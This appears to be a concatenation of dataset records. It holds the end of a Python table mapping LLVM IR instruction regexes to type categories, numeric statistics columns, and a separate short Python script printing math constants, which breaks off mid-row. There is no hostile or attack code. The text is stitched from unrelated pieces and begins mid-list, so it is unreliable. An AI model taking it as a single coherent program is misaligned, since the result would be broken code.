['<%ID> = phi \[\d+ x i128\]\*\*\* .*', '[d x i128]*** operation', '[d x int]*** operation'],
['<%ID> = phi i1\* .*', 'i1* operation', 'int* operation'],
['<%ID> = phi i2\* .*', 'i2* operation', 'int* operation'],
['<%ID> = phi i4\* .*', 'i4* operation', 'int* operation'],
['<%ID> = phi i8\* .*', 'i8* operation', 'int* operation'],
['<%ID> = phi i16\* .*', 'i16* operation', 'int* operation'],
['<%ID> = phi i32\* .*', 'i32* operation', 'int* operation'],
['<%ID> = phi i40\* .*', 'i40* operation', 'int* operation'],
['<%ID> = phi i64\* .*', 'i64* operation', 'int* operation'],
['<%ID> = phi i128\* .*', 'i128* operation', 'int* operation'],
['<%ID> = phi i1\*\* .*', 'i1** operation', 'int** operation'],
['<%ID> = phi i2\*\* .*', 'i2** operation', 'int** operation'],
['<%ID> = phi i4\*\* .*', 'i4** operation', 'int** operation'],
['<%ID> = phi i8\*\* .*', 'i8** operation', 'int** operation'],
['<%ID> = phi i16\*\* .*', 'i16** operation', 'int** operation'],
['<%ID> = phi i32\*\* .*', 'i32** operation', 'int** operation'],
['<%ID> = phi i40\*\* .*', 'i40** operation', 'int** operation'],
['<%ID> = phi i64\*\* .*', 'i64** operation', 'int** operation'],
['<%ID> = phi i128\*\* .*', 'i128** operation', 'int** operation'],
['<%ID> = phi i1\*\*\* .*', 'i1*** operation', 'int*** operation'],
['<%ID> = phi i2\*\*\* .*', 'i2*** operation', 'int*** operation'],
['<%ID> = phi i4\*\*\* .*', 'i4*** operation', 'int*** operation'],
['<%ID> = phi i8\*\*\* .*', 'i8*** operation', 'int*** operation'],
['<%ID> = phi i16\*\*\* .*', 'i16*** operation', 'int*** operation'],
['<%ID> = phi i32\*\*\* .*', 'i32*** operation', 'int*** operation'],
['<%ID> = phi i64\*\*\* .*', 'i64*** operation', 'int*** operation'],
['<%ID> = phi i128\*\*\* .*', 'i128*** operation', 'int*** operation'],
['<%ID> = phi x86_fp80 .*', 'float operation', 'floating point operation'],
['<%ID> = phi float .*', 'float operation', 'floating point operation'],
['<%ID> = phi double .*', 'double operation', 'floating point operation'],
['<%ID> = phi <\d+ x x86_fp80> .*', '<d x float> operation', '<d x floating point> operation'],
['<%ID> = phi <\d+ x float> .*', '<d x float> operation', '<d x floating point> operation'],
['<%ID> = phi <\d+ x double> .*', '<d x double> operation', '<d x floating point> operation'],
['<%ID> = phi x86_fp80\* .*', 'float* operation', 'floating point* operation'],
['<%ID> = phi <\d+ x x86_fp80\*> .*', '<d x float*> operation', '<d x floating point*> operation'],
['<%ID> = phi <\d+ x float\*> .*', '<d x float*> operation', '<d x floating point*> operation'],
['<%ID> = phi <\d+ x double\*> .*', '<d x double*> operation', '<d x floating point*> operation'],
['<%ID> = phi <\d+ x x86_fp80>\* .*', '<d x float>* operation', '<d x floating point>* operation'],
['<%ID> = phi <\d+ x float>\* .*', '<d x float>* operation', '<d x floating point>* operation'],
['<%ID> = phi <\d+ x double>\* .*', '<d x double>* operation', '<d x floating point>* operation'],
['<%ID> = phi x86_fp80\* .*', 'float* operation', 'floating point* operation'],
['<%ID> = phi float\* .*', 'float* operation', 'floating point* operation'],
['<%ID> = phi double\* .*', 'double* operation', 'floating point* operation'],
['<%ID> = phi x86_fp80\*\* .*', 'float** operation', 'floating point** operation'],
['<%ID> = phi float\*\* .*', 'float** operation', 'floating point** operation'],
['<%ID> = phi double\*\* .*', 'double** operation', 'floating point** operation'],
['<%ID> = phi x86_fp80\*\*\* .*', 'float*** operation', 'floating point*** operation'],
['<%ID> = phi float\*\*\* .*', 'float*** operation', 'floating point*** operation'],
['<%ID> = phi double\*\*\* .*', 'double*** operation', 'floating point*** operation'],
['<%ID> = phi void \(.*\) \[.*', 'function op', 'function op'],
['<%ID> = phi void \(.*\)\* \[.*', 'function* op', 'function* op'],
['<%ID> = phi void \(.*\)\*\* \[.*', 'function** op', 'function** op'],
['<%ID> = phi void \(.*\)\*\*\* \[.*', 'function*** op', 'function*** op'],
['<%ID> = phi (<?{|opaque|<%ID>) .*', 'struct/class op', 'struct/class op'],
['<%ID> = phi (<?{|opaque|<%ID>)\* .*', 'struct/class* op', 'struct/class* op'],
['<%ID> = phi (<?{|opaque|<%ID>)\*\* .*', 'struct/class** op', 'struct/class** op'],
['<%ID> = phi (<?{|opaque|<%ID>)\*\*\* .*', 'struct/class*** op', 'struct/class*** op'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + 'i1, .*', 'i1 operation', 'int operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + 'i2, .*', 'i2 operation', 'int operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + 'i4, .*', 'i4 operation', 'int operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + 'i8, .*', 'i8 operation', 'int operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + 'i16, .*', 'i16 operation', 'int operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + 'i32, .*', 'i32 operation', 'int operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + 'i64, .*', 'i64 operation', 'int operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + 'i128, .*', 'i128 operation', 'int operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + 'i1\*, .*', 'i1* operation', 'int* operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + 'i2\*, .*', 'i2* operation', 'int* operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + 'i4\*, .*', 'i4* operation', 'int* operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + 'i8\*, .*', 'i8* operation', 'int* operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + 'i16\*, .*', 'i16* operation', 'int* operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + 'i32\*, .*', 'i32* operation', 'int* operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + 'i64\*, .*', 'i64* operation', 'int* operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + 'i128\*, .*', 'i128* operation', 'int* operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + 'i1\*\*, .*', 'i1** operation', 'int** operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + 'i2\*\*, .*', 'i2** operation', 'int** operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + 'i4\*\*, .*', 'i4** operation', 'int** operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + 'i8\*\*, .*', 'i8** operation', 'int** operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + 'i16\*\*, .*', 'i16** operation', 'int** operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + 'i32\*\*, .*', 'i32** operation', 'int** operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + 'i64\*\*, .*', 'i64** operation', 'int** operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + 'i128\*\*, .*', 'i128** operation', 'int** operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + 'x86_fp80, .*', 'float operation', 'floating point operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + 'float, .*', 'float operation', 'floating point operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + 'double, .*', 'double operation', 'floating point operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + 'x86_fp80\*, .*', 'float* operation', 'floating point* operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + 'float\*, .*', 'float* operation', 'floating point* operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + 'double\*, .*', 'double* operation', 'floating point* operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + 'x86_fp80\*\*, .*', 'float** operation',
'floating point** operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + 'float\*\*, .*', 'float** operation', 'floating point** operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + 'double\*\*, .*', 'double** operation', 'floating point** operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '%".*', 'struct/class op', 'struct/class op'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '<%.*', 'struct/class op', 'struct/class op'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '<?{.*', 'struct/class op', 'struct/class op'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + 'opaque.*', 'struct/class op', 'struct/class op'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '<\d+ x i1>, .*', '<d x i1> operation', '<d x int> operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '<\d+ x i2>, .*', '<d x i2> operation', '<d x int> operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '<\d+ x i4>, .*', '<d x i4> operation', '<d x int> operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '<\d+ x i8>, .*', '<d x i8> operation', '<d x int> operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '<\d+ x i16>, .*', '<d x i16> operation', '<d x int> operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '<\d+ x i32>, .*', '<d x i32> operation', '<d x int> operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '<\d+ x i64>, .*', '<d x i64> operation', '<d x int> operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '<\d+ x i128>, .*', '<d x i128> operation', '<d x int> operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '<\d+ x x86_fp80>, .*', '<d x float> operation',
'<d x floating point> operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '<\d+ x float>, .*', '<d x float> operation',
'<d x floating point> operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '<\d+ x double>, .*', '<d x double> operation',
'<d x floating point> operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '<\d+ x i1>\*, .*', '<d x i1>* operation', '<d x int>* operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '<\d+ x i2>\*, .*', '<d x i2>* operation', '<d x int>* operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '<\d+ x i4>\*, .*', '<d x i4>* operation', '<d x int>* operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '<\d+ x i8>\*, .*', '<d x i8>* operation', '<d x int>* operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '<\d+ x i16>\*, .*', '<d x i16>* operation', '<d x int>* operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '<\d+ x i32>\*, .*', '<d x i32>* operation', '<d x int>* operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '<\d+ x i64>\*, .*', '<d x i64>* operation', '<d x int>* operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '<\d+ x i128>\*, .*', '<d x i128>* operation',
'<d x int>* operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '<\d+ x x86_fp80>\*, .*', '<d x float>* operation',
'<d x floating point>* operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '<\d+ x float>\*, .*', '<d x float>* operation',
'<d x floating point>* operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '<\d+ x double>\*, .*', '<d x double>* operation',
'<d x floating point>* operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '\[\d+ x i1\], .*', '[d x i1] operation', '[d x int] operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '\[\d+ x i2\], .*', '[d x i2] operation', '[d x int] operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '\[\d+ x i4\], .*', '[d x i4] operation', '[d x int] operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '\[\d+ x i8\], .*', '[d x i8] operation', '[d x int] operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '\[\d+ x i16\], .*', '[d x i16] operation', '[d x int] operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '\[\d+ x i32\], .*', '[d x i32] operation', '[d x int] operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '\[\d+ x i64\], .*', '[d x i64] operation', '[d x int] operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '\[\d+ x i128\], .*', '[d x i128] operation', '[d x int] operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '\[\d+ x x86_fp80\], .*', '[d x float] operation',
'[d x floating point] operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '\[\d+ x float\], .*', '[d x float] operation',
'[d x floating point] operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '\[\d+ x double\], .*', '[d x double] operation',
'[d x floating point] operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '\[\d+ x .*\], .*', 'array of array operation',
'array of array operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '\[\d+ x i1\]\*, .*', '[d x i1]* operation', '[d x int] operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '\[\d+ x i2\]\*, .*', '[d x i2]* operation', '[d x int] operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '\[\d+ x i4\]\*, .*', '[d x i4]* operation', '[d x int] operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '\[\d+ x i8\]\*, .*', '[d x i8]* operation', '[d x int] operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '\[\d+ x i16\]\*, .*', '[d x i16]* operation', '[d x int] operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '\[\d+ x i32\]\*, .*', '[d x i32]* operation', '[d x int] operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '\[\d+ x i64\]\*, .*', '[d x i64]* operation', '[d x int] operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '\[\d+ x i128\]\*, .*', '[d x i128]* operation',
'[d x int] operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '\[\d+ x x86_fp80\]\*, .*', '[d x float]* operation',
'[d x floating point] operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '\[\d+ x float\]\*, .*', '[d x float]* operation',
'[d x floating point] operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '\[\d+ x double\]\*, .*', '[d x double]* operation',
'[d x floating point] operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '\[\d+ x .*\]\*, .*', 'array of array* operation',
'array of array operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '\[\d+ x i1\]\*\*, .*', '[d x i1]** operation',
'[d x int] operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '\[\d+ x i2\]\*\*, .*', '[d x i2]** operation',
'[d x int] operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '\[\d+ x i4\]\*\*, .*', '[d x i4]** operation',
'[d x int] operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '\[\d+ x i8\]\*\*, .*', '[d x i8]** operation',
'[d x int] operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '\[\d+ x i16\]\*\*, .*', '[d x i16]** operation',
'[d x int] operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '\[\d+ x i32\]\*\*, .*', '[d x i32]** operation',
'[d x int] operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '\[\d+ x i64\]\*\*, .*', '[d x i64]** operation',
'[d x int] operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '\[\d+ x i128\]\*\*, .*', '[d x i128]** operation',
'[d x int] operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '\[\d+ x x86_fp80\]\*\*, .*', '[d x float]** operation',
'[d x floating point] operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '\[\d+ x float\]\*\*, .*', '[d x float]** operation',
'[d x floating point] operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '\[\d+ x double\]\*\*, .*', '[d x double]** operation',
'[d x floating point] operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '\[\d+ x .*\], .*', 'array of array** operation',
'array of array operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '.*\(.*\)\*+, .*', 'function operation', 'function operation'],
['<%ID> = invoke ' + any_of(opt_invoke) + '*i1 .*', 'i1 operation', 'int operation'],
['<%ID> = invoke ' + any_of(opt_invoke) + '*i2 .*', 'i2 operation', 'int operation'],
['<%ID> = invoke ' + any_of(opt_invoke) + '*i4 .*', 'i4 operation', 'int operation'],
['<%ID> = invoke ' + any_of(opt_invoke) + '*i8 .*', 'i8 operation', 'int operation'],
['<%ID> = invoke ' + any_of(opt_invoke) + '*i16 .*', 'i16 operation', 'int operation'],
['<%ID> = invoke ' + any_of(opt_invoke) + '*i32 .*', 'i32 operation', 'int operation'],
['<%ID> = invoke ' + any_of(opt_invoke) + '*i64 .*', 'i64 operation', 'int operation'],
['<%ID> = invoke ' + any_of(opt_invoke) + '*i128 .*', 'i128 operation', 'int operation'],
['<%ID> = invoke ' + any_of(opt_invoke) + '*i1\* .*', 'i1* operation', 'int* operation'],
['<%ID> = invoke ' + any_of(opt_invoke) + '*i2\* .*', 'i2* operation', 'int* operation'],
['<%ID> = invoke ' + any_of(opt_invoke) + '*i4\* .*', 'i4* operation', 'int* operation'],
['<%ID> = invoke ' + any_of(opt_invoke) + '*i8\* .*', 'i8* operation', 'int* operation'],
['<%ID> = invoke ' + any_of(opt_invoke) + '*i16\* .*', 'i16* operation', 'int* operation'],
['<%ID> = invoke ' + any_of(opt_invoke) + '*i32\* .*', 'i32* operation', 'int* operation'],
['<%ID> = invoke ' + any_of(opt_invoke) + '*i64\* .*', 'i64* operation', 'int* operation'],
['<%ID> = invoke ' + any_of(opt_invoke) + '*i128\* .*', 'i128* operation', 'int* operation'],
['<%ID> = invoke ' + any_of(opt_invoke) + '*x86_fp80 .*', 'float operation', 'floating point operation'],
['<%ID> = invoke ' + any_of(opt_invoke) + '*float .*', 'float operation', 'floating point operation'],
['<%ID> = invoke ' + any_of(opt_invoke) + '*double .*', 'double operation', 'floating point operation'],
['<%ID> = invoke ' + any_of(opt_invoke) + '*x86_fp80\* .*', 'float* operation', 'floating point* operation'],
['<%ID> = invoke ' + any_of(opt_invoke) + '*float\* .*', 'float* operation', 'floating point* operation'],
['<%ID> = invoke ' + any_of(opt_invoke) + '*double\* .*', 'double* operation', 'floating point* operation'],
['<%ID> = invoke ' + any_of(opt_invoke) + '*%".*', 'struct/class op', 'struct/class op'],
['<%ID> = invoke ' + any_of(opt_invoke) + '*<?{.*', 'struct/class op', 'struct/class op'],
['<%ID> = invoke ' + any_of(opt_invoke) + '*opaque.*', 'struct/class op', 'struct/class op'],
['<%ID> = invoke ' + any_of(opt_invoke) + '*%".*\*.*', 'struct/class* op', 'struct/class op'],
['<%ID> = invoke ' + any_of(opt_invoke) + '*void .*', 'void op', 'void op'],
['invoke ' + any_of(opt_invoke) + '*void .*', 'void op', 'void op'],
['<%ID> = extractelement <\d+ x i1> .*', '<d x i1> operation', '<d x int> operation'],
['<%ID> = extractelement <\d+ x i1\*> .*', '<d x i1*> operation', '<d x int*> operation'],
['<%ID> = extractelement <\d+ x i2> .*', '<d x i2> operation', '<d x int> operation'],
['<%ID> = extractelement <\d+ x i2\*> .*', '<d x i2*> operation', '<d x int*> operation'],
['<%ID> = extractelement <\d+ x i4> .*', '<d x i4> operation', '<d x int> operation'],
['<%ID> = extractelement <\d+ x i4\*> .*', '<d x i4*> operation', '<d x int*> operation'],
['<%ID> = extractelement <\d+ x i8> .*', '<d x i8> operation', '<d x int> operation'],
['<%ID> = extractelement <\d+ x i8\*> .*', '<d x i8*> operation', '<d x int*> operation'],
['<%ID> = extractelement <\d+ x i16> .*', '<d x i16> operation', '<d x int> operation'],
['<%ID> = extractelement <\d+ x i16\*> .*', '<d x i16*> operation', '<d x int*> operation'],
['<%ID> = extractelement <\d+ x i32> .*', '<d x i32> operation', '<d x int> operation'],
['<%ID> = extractelement <\d+ x i32\*> .*', '<d x i32*> operation', '<d x int*> operation'],
['<%ID> = extractelement <\d+ x i64> .*', '<d x i64> operation', '<d x int> operation'],
['<%ID> = extractelement <\d+ x i64\*> .*', '<d x i64*> operation', '<d x int*> operation'],
['<%ID> = extractelement <\d+ x i128> .*', '<d x i128> operation', '<d x int> operation'],
['<%ID> = extractelement <\d+ x i128\*> .*', '<d x i128*> operation', '<d x int*> operation'],
['<%ID> = extractelement <\d+ x x86_fp80> .*', '<d x float> operation', '<d x floating point> operation'],
['<%ID> = extractelement <\d+ x x86_fp80\*> .*', '<d x float*> operation', '<d x floating point*> operation'],
['<%ID> = extractelement <\d+ x float> .*', '<d x float> operation', '<d x floating point> operation'],
['<%ID> = extractelement <\d+ x float\*> .*', '<d x float*> operation', '<d x floating point*> operation'],
['<%ID> = extractelement <\d+ x double> .*', '<d x double> operation', '<d x floating point> operation'],
['<%ID> = extractelement <\d+ x double\*> .*', '<d x double*> operation', '<d x floating point*> operation'],
['<%ID> = extractelement <\d+ x \{.*\}> .*', '<d x struct> operation', '<d x struct> operation'],
['<%ID> = extractelement <\d+ x \{.*\}\*> .*', '<d x struct*> operation', '<d x struct*> operation'],
['<%ID> = insertelement <\d+ x i1> .*', '<d x i1> operation', '<d x int> operation'],
['<%ID> = insertelement <\d+ x i1\*> .*', '<d x i1*> operation', '<d x int*> operation'],
['<%ID> = insertelement <\d+ x i2> .*', '<d x i2> operation', '<d x int> operation'],
['<%ID> = insertelement <\d+ x i2\*> .*', '<d x i2*> operation', '<d x int*> operation'],
['<%ID> = insertelement <\d+ x i4> .*', '<d x i4> operation', '<d x int> operation'],
['<%ID> = insertelement <\d+ x i4\*> .*', '<d x i4*> operation', '<d x int*> operation'],
['<%ID> = insertelement <\d+ x i8> .*', '<d x i8> operation', '<d x int> operation'],
['<%ID> = insertelement <\d+ x i8\*> .*', '<d x i8*> operation', '<d x int*> operation'],
['<%ID> = insertelement <\d+ x i16> .*', '<d x i16> operation', '<d x int> operation'],
['<%ID> = insertelement <\d+ x i16\*> .*', '<d x i16*> operation', '<d x int*> operation'],
['<%ID> = insertelement <\d+ x i32> .*', '<d x i32> operation', '<d x int> operation'],
['<%ID> = insertelement <\d+ x i32\*> .*', '<d x i32*> operation', '<d x int*> operation'],
['<%ID> = insertelement <\d+ x i64> .*', '<d x i64> operation', '<d x int> operation'],
['<%ID> = insertelement <\d+ x i64\*> .*', '<d x i64*> operation', '<d x int*> operation'],
['<%ID> = insertelement <\d+ x i128> .*', '<d x i128> operation', '<d x int> operation'],
['<%ID> = insertelement <\d+ x i128\*> .*', '<d x i128*> operation', '<d x int*> operation'],
['<%ID> = insertelement <\d+ x x86_fp80> .*', '<d x float> operation', '<d x floating point> operation'],
['<%ID> = insertelement <\d+ x x86_fp80\*> .*', '<d x float*> operation', '<d x floating point*> operation'],
['<%ID> = insertelement <\d+ x float> .*', '<d x float> operation', '<d x floating point> operation'],
['<%ID> = insertelement <\d+ x float\*> .*', '<d x float*> operation', '<d x floating point*> operation'],
['<%ID> = insertelement <\d+ x double> .*', '<d x double> operation', '<d x floating point> operation'],
['<%ID> = insertelement <\d+ x double\*> .*', '<d x double*> operation', '<d x floating point*> operation'],
['<%ID> = insertelement <\d+ x \{.*\}> .*', '<d x struct> operation', '<d x struct> operation'],
['<%ID> = insertelement <\d+ x \{.*\}\*> .*', '<d x struct*> operation', '<d x struct*> operation'],
['<%ID> = shufflevector <\d+ x i1> .*', '<d x i1> operation', '<d x int> operation'],
['<%ID> = shufflevector <\d+ x i1\*> .*', '<d x i1*> operation', '<d x int*> operation'],
['<%ID> = shufflevector <\d+ x i2> .*', '<d x i2> operation', '<d x int> operation'],
['<%ID> = shufflevector <\d+ x i2\*> .*', '<d x i2*> operation', '<d x int*> operation'],
['<%ID> = shufflevector <\d+ x i4> .*', '<d x i4> operation', '<d x int> operation'],
['<%ID> = shufflevector <\d+ x i4\*> .*', '<d x i4*> operation', '<d x int*> operation'],
['<%ID> = shufflevector <\d+ x i8> .*', '<d x i8> operation', '<d x int> operation'],
['<%ID> = shufflevector <\d+ x i8\*> .*', '<d x i8*> operation', '<d x int*> operation'],
['<%ID> = shufflevector <\d+ x i16> .*', '<d x i16> operation', '<d x int> operation'],
['<%ID> = shufflevector <\d+ x i16\*> .*', '<d x i16*> operation', '<d x int*> operation'],
['<%ID> = shufflevector <\d+ x i32> .*', '<d x i32> operation', '<d x int> operation'],
['<%ID> = shufflevector <\d+ x i32\*> .*', '<d x i32*> operation', '<d x int*> operation'],
['<%ID> = shufflevector <\d+ x i64> .*', '<d x i64> operation', '<d x int> operation'],
['<%ID> = shufflevector <\d+ x i64\*> .*', '<d x i64*> operation', '<d x int*> operation'],
['<%ID> = shufflevector <\d+ x i128> .*', '<d x i128> operation', '<d x int> operation'],
['<%ID> = shufflevector <\d+ x i128\*> .*', '<d x i128*> operation', '<d x int*> operation'],
['<%ID> = shufflevector <\d+ x x86_fp80> .*', '<d x float> operation', '<d x floating point> operation'],
['<%ID> = shufflevector <\d+ x x86_fp80\*> .*', '<d x float*> operation', '<d x floating point*> operation'],
['<%ID> = shufflevector <\d+ x float> .*', '<d x float> operation', '<d x floating point> operation'],
['<%ID> = shufflevector <\d+ x float\*> .*', '<d x float*> operation', '<d x floating point*> operation'],
['<%ID> = shufflevector <\d+ x double> .*', '<d x double> operation', '<d x floating point> operation'],
['<%ID> = shufflevector <\d+ x double\*> .*', '<d x double*> operation', '<d x floating point*> operation'],
['<%ID> = shufflevector <\d+ x \{.*\}> .*', '<d x struct> operation', '<d x struct> operation'],
['<%ID> = shufflevector <\d+ x \{.*\}\*> .*', '<d x struct*> operation', '<d x struct*> operation'],
['<%ID> = bitcast void \(.* to .*', 'in-between operation', 'in-between operation'],
['<%ID> = bitcast (i\d+|float|double|x86_fp80|opaque) .* to .*', 'in-between operation', 'in-between operation'],
['<%ID> = bitcast (i\d+|float|double|x86_fp80|opaque)\* .* to .*', 'in-between operation', 'in-between operation'],
['<%ID> = bitcast (i\d+|float|double|x86_fp80|opaque)\*\* .* to .*', 'in-between operation',
'in-between operation'],
['<%ID> = bitcast (i\d+|float|double|x86_fp80|opaque)\*\*\* .* to .*', 'in-between operation',
'in-between operation'],
['<%ID> = bitcast \[\d+.* to .*', 'in-between operation', 'in-between operation'],
['<%ID> = bitcast <\d+.* to .*', 'in-between operation', 'in-between operation'],
['<%ID> = bitcast (%"|<%|<?{).* to .*', 'in-between operation', 'in-between operation'],
['<%ID> = fpext .*', 'in-between operation', 'in-between operation'],
['<%ID> = fptrunc .*', 'in-between operation', 'in-between operation'],
['<%ID> = sext .*', 'in-between operation', 'in-between operation'],
['<%ID> = trunc .* to .*', 'in-between operation', 'in-between operation'],
['<%ID> = zext .*', 'in-between operation', 'in-between operation'],
['<%ID> = sitofp .*', 'in-between operation', 'in-between operation'],
['<%ID> = uitofp .*', 'in-between operation', 'in-between operation'],
['<%ID> = inttoptr .*', 'in-between operation', 'in-between operation'],
['<%ID> = ptrtoint .*', 'in-between operation', 'in-between operation'],
['<%ID> = fptosi .*', 'in-between operation', 'in-between operation'],
['<%ID> = fptoui .*', 'in-between operation', 'in-between operation'],
['<%ID> = extractvalue .*', 'in-between operation', 'in-between operation'],
['<%ID> = insertvalue .*', 'in-between operation', 'in-between operation'],
['resume .*', 'in-between operation', 'in-between operation'],
['(tail |musttail |notail )?call( \w+)? void .*', 'call void', 'call void'],
["i\d{1,2} <(INT|FLOAT)>, label <%ID>", 'blob', 'blob'],
["<%ID> = select .*", 'blob', 'blob'],
[".*to label.*unwind label.*", 'blob', 'blob'],
["catch .*", 'blob', 'blob'],
["cleanup", 'blob', 'blob'],
["<%ID> = landingpad .", 'blob', 'blob'],
["; <label>:<LABEL>", 'blob', 'blob'],
["<LABEL>:", 'blob', 'blob'],
["br i1 .*", 'blob', 'blob'],
["br label .*", 'blob', 'blob'],
["indirectbr .*", 'blob', 'blob'],
["switch .*", 'blob', 'blob'],
["unreachable.*", 'blob', 'blob'],
["ret void", 'blob', 'blob'],
['!UNK', 'blob', 'blob']
]
| 79.505495
| 156
| 0.523566
| 19,348
| 151,935
| 4.002222
| 0.025636
| 0.049874
| 0.132162
| 0.086602
| 0.905237
| 0.896223
| 0.876322
| 0.833912
| 0.82588
| 0.822018
| 0
| 0.029515
| 0.196775
| 151,935
| 1,910
| 157
| 79.54712
| 0.605
| 0.020858
| 0
| 0.109348
| 0
| 0.016431
| 0.639432
| 0.013325
| 0.000567
| 0
| 0
| 0.000524
| 0.004533
| 1
| 0.005099
| false
| 0
| 0.002266
| 0
| 0.011898
| 0.000567
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e6c2f12ec39af1443ccbdf0435b30b7c9f65f834
| 107
|
py
|
Python
|
Basic/15_python_math/math_konstanta.py
|
sekilas13/Python
|
8b2c91cf0c90ebaba7a22e97bd69dae7a6564714
|
[
"MIT"
] | 79
|
2021-09-12T02:31:14.000Z
|
2022-03-29T08:46:53.000Z
|
Basic/15_python_math/math_konstanta.py
|
sekilas13/Python
|
8b2c91cf0c90ebaba7a22e97bd69dae7a6564714
|
[
"MIT"
] | 121
|
2021-09-10T02:38:47.000Z
|
2022-03-30T03:30:35.000Z
|
Basic/15_python_math/math_konstanta.py
|
sekilas13/Python
|
8b2c91cf0c90ebaba7a22e97bd69dae7a6564714
|
[
"MIT"
] | 76
|
2021-09-10T02:27:28.000Z
|
2022-03-28T10:24:12.000Z
|
import math
print(math.pi)
print(math.e)
print(math.tau)
print(math.inf)
print(-math.inf)
print(math.nan)
| 11.888889
| 16
| 0.738318
| 20
| 107
